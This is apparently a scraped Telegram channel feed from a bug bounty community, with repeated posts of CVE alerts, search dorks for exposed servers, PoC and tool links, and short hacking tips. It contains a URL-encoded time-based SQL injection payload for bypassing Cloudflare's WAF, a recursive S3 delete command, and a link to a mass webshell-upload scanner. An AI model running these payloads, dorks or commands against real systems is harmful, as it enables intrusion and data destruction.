π― TryHackMe Voucher Giveaway at 1000 Members! π―
Weβre on the road to 1,000 members in our Discord community! π
Currently at 700+ strong, and once we hit 1K, weβll be giving away a TryHackMe Voucher to Three lucky member! ππ»
π’ What You Need to Do:
Join the Discord: https://discord.gg/u7uMFV833h
Stay active, invite your friends
Once we reach 1,000 members, the giveaway will go live!
π’ Letβs grow this amazing community together β learning, hacking, and winning! π₯
Weβre on the road to 1,000 members in our Discord community! π
Currently at 700+ strong, and once we hit 1K, weβll be giving away a TryHackMe Voucher to Three lucky member! ππ»
π’ What You Need to Do:
Join the Discord: https://discord.gg/u7uMFV833h
Stay active, invite your friends
Once we reach 1,000 members, the giveaway will go live!
π’ Letβs grow this amazing community together β learning, hacking, and winning! π₯
Discord
Join the Brut Security Discord Server!
Check out the Brut Security community on Discord - hang out with 950 other members and enjoy free voice and text chat.
π₯3β€2
CVE-2025-42963: Deserialization of Untrusted Data in SAP NetWeaver Application server for Java, 9.1 rating π₯
A vulnerability in the LogViewer component allows an authenticated attacker to exploit unsafe Java object deserialization, which could lead to complete control over the system.
Search at Netlas.io:
π Link: https://nt.ls/0c6Ud
π Dork: http.headers.server:"NetWeaver"
Vendor's advisory: https://support.sap.com/en/my-support/knowledge-base/security-notes-news/july-2025.html
A vulnerability in the LogViewer component allows an authenticated attacker to exploit unsafe Java object deserialization, which could lead to complete control over the system.
Search at Netlas.io:
π Link: https://nt.ls/0c6Ud
π Dork: http.headers.server:"NetWeaver"
Vendor's advisory: https://support.sap.com/en/my-support/knowledge-base/security-notes-news/july-2025.html
π₯5
βΆοΈ It's LIVE!
πSubWatch β your next favorite tool for automated VPS subdomain monitoring! π
β Supported On VPS
β Runs every 6 hours
β Sends newly found subdomains directly to your Discord
β Includes .txt file + message alerts
β Perfect for bug bounty hunters & recon workflows
π½οΈ Watch the YouTube video & get started now:
π https://youtu.be/BkpSQKSTFUI
π₯ Download & Readme on GitHub:
π https://github.com/Brut-Security/SubWatch
π§ Powered by: subfinder, anew, jq, notify
Built with π by Brut Security
β€οΈ Give it a try, share it with your team, and drop your reactions below!
πSubWatch β your next favorite tool for automated VPS subdomain monitoring! π
β Supported On VPS
β Runs every 6 hours
β Sends newly found subdomains directly to your Discord
β Includes .txt file + message alerts
β Perfect for bug bounty hunters & recon workflows
π½οΈ Watch the YouTube video & get started now:
π https://youtu.be/BkpSQKSTFUI
π₯ Download & Readme on GitHub:
π https://github.com/Brut-Security/SubWatch
π§ Powered by: subfinder, anew, jq, notify
Built with π by Brut Security
β€οΈ Give it a try, share it with your team, and drop your reactions below!
YouTube
π¨ New Subdomain Monitoring Tool for Bug Bounty Hunters! | Brut Security
π‘οΈ Introducing SubWatch: Automated Subdomain Monitoring Script by Brut Security
Stay one step ahead in your recon game!
This tool continuously monitors your target domains for new subdomains using subfinder, stores historical data, and sends alerts directlyβ¦
Stay one step ahead in your recon game!
This tool continuously monitors your target domains for new subdomains using subfinder, stores historical data, and sends alerts directlyβ¦
β€15
π¨CVE-2025-5777 (CitrixBleed 2) - Critical memory leak vulnerability affecting Citrix NetScaler ADC and Gateway devices
π―Severity: CRITICAL β οΈ
β PoC: https://github.com/win3zz/CVE-2025-5777
π―Severity: CRITICAL β οΈ
β PoC: https://github.com/win3zz/CVE-2025-5777
β€3π₯3
CVE-2025-49704: Code Injection in Microsoft SharePoint, 8.8 ratingβοΈ
The vulnerability allows an authenticated attacker to execute code over the network.
Search at Netlas.io:
π Link: https://nt.ls/1egrVπ Dork: http.headers.microsoftsharepointteamservices:*
Vendor's advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49704
The vulnerability allows an authenticated attacker to execute code over the network.
Search at Netlas.io:
π Link: https://nt.ls/1egrVπ Dork: http.headers.microsoftsharepointteamservices:*
Vendor's advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49704
β€4
π¨ Bug Bounty Tip: Takeover Vulnerable S3 Buckets in Under a Minute! βοΈ
Want to identify exposed Amazon S3 buckets linked to a target? Here's a quick method:
π Then check for public S3 buckets:
π If the bucket name isnβt obvious:
β οΈ Found a vulnerable bucket? Donβt delete anything!
β Always report responsibly. Never exploit β you're here to help, not harm.
β‘οΈ Happy Hunting!
Want to identify exposed Amazon S3 buckets linked to a target? Here's a quick method:
echo REDACTED.COM | cariddi | grep js | tee js_files | httpx -mc 200 | nuclei -tags aws,amazon
π Then check for public S3 buckets:
aws s3 ls s3://REDACTEDCOM.s3.amazonaws.com
π If the bucket name isnβt obvious:
echo REDACTED.COM | cariddi -e -s -info
β οΈ Found a vulnerable bucket? Donβt delete anything!
# Do NOT run this. Just for awareness:
aws s3 rm s3://REDACTEDCOM.s3.amazonaws.com --recursive
β Always report responsibly. Never exploit β you're here to help, not harm.
β‘οΈ Happy Hunting!
β€11π7π₯4πΏ2
π‘οΈ Bug Bounty Tip: Cloudflare 403 Bypass for Time-Based Blind SQLi
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
β Blocked Payload
β Bypass Payload
π This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
β Credit: @nav1n0x
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
β Blocked Payload
(select(0)from(select(sleep(10)))v) β 403 Forbidden
β Bypass Payload
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)
π This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
β Credit: @nav1n0x
β€35π5πΏ4π1
β‘SSTImap - Automatic SSTI detection tool with interactive interface
β https://github.com/vladko312/SSTImap
β https://github.com/vladko312/SSTImap
β€11π3
Tired of switching tabs for OSINT and recon? Just join our Discord and type sudo help to unlock powerful tools in seconds!
β IP & Domain Lookup
β Email & Phone OSINT
β Subdomain Enumeration
β Reverse Image Search
β URL & Virus Scanners
β Temp Email, QR Tools, and more
π You can create and play your own CTF in a minute , right inside Discord!
Try it out now β itβs fast, simple, and all in one chat.
π https://discord.gg/u7uMFV833h
#ctf #bugbounty #osint #cybersecurity #discordtools #infosec
β IP & Domain Lookup
β Email & Phone OSINT
β Subdomain Enumeration
β Reverse Image Search
β URL & Virus Scanners
β Temp Email, QR Tools, and more
π You can create and play your own CTF in a minute , right inside Discord!
Try it out now β itβs fast, simple, and all in one chat.
π https://discord.gg/u7uMFV833h
#ctf #bugbounty #osint #cybersecurity #discordtools #infosec
1π«‘8β€4
π¨A comprehensive bug bounty methodology compiled from extensive research, covering web application reconnaissance, checklists, and methods for identifying various bugs. This guide aims to help bug hunters improve their skills in finding, verifying, and responsibly reporting security vulnerabilities.
β Download: https://github.com/alihussainzada/BugHunterMethodology/
β Download: https://github.com/alihussainzada/BugHunterMethodology/
β€11π4
β‘CloakQuest3r - Uncover the true IP address of websites safeguarded by Cloudflare & Others
β https://github.com/spyboy-productions/CloakQuest3r
β https://github.com/spyboy-productions/CloakQuest3r
β€22
This media is not supported in your browser
VIEW IN TELEGRAM
β‘Scanning github repos is a great way to find juicy information, secrets and credentials!
Trufflehog makes this easy.
With one scan you can find AWS keys, FTP creds, crypto keys and more!
β Check this out - https://github.com/trufflesecurity/trufflehog
Trufflehog makes this easy.
With one scan you can find AWS keys, FTP creds, crypto keys and more!
β Check this out - https://github.com/trufflesecurity/trufflehog
β€24π₯7π2
π¨Multi-target unauthenticated RCE scanner for CVE-2025-34085 affecting WordPress Simple File List plugin. Uploads, renames, and triggers PHP webshells across large target sets.
β https://github.com/ill-deed/CVE-2025-34085-Multi-target
β https://github.com/ill-deed/CVE-2025-34085-Multi-target
π6β€4
π¨ CVE-2025-47812: Wing FTP Server Remote Code Execution (RCE) vulnerability
π₯PoC : https://github.com/4m3rr0r/CVE-2025-47812-poc
πDorks:
HUNTER: https://product.name="Wing FTP Server"
π₯PoC : https://github.com/4m3rr0r/CVE-2025-47812-poc
πDorks:
HUNTER: https://product.name="Wing FTP Server"
π₯11β€4π4